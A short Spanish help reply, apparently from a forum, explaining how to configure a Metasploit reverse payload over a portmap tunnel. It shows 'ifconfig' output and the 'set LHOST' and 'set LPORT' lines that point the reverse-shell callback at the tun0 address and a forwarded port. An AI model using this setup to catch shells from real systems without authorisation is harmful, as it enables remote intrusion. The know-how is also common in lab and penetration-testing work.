Hola.
1. Asegúrate de tener el puerto 4545 abierto en tu Router.
2. El payload se genera con el host y port de portmap.
3. Al momento de configurar el exploit en la consola de metasploit, la ip y puerto que tienes que poner la puedes encontrar en tun0 al momento de ejecutar el comando de ifconfig:
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.253.132 netmask 255.255.255.0 broadcast 192.168.253.255
inet6 fe80::20c:29ff:fe1b:57dd prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:1b:57:dd txqueuelen 1000 (Ethernet)
RX packets 157 bytes 37641 (36.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 52 bytes 7753 (7.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.9.246.94 netmask 255.255.255.255 destination 10.9.246.93
inet6 fe80::f44a:ca6d:f9c6:4751 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 50
Tendras que usar los datos de tun0. En este caso quedaria
set LHOST 10.9.246.94
set LPORT (puerto que tienes abierto en el router, en tu caso 4545)
Si esta todo correcto debería funcionar todo bien.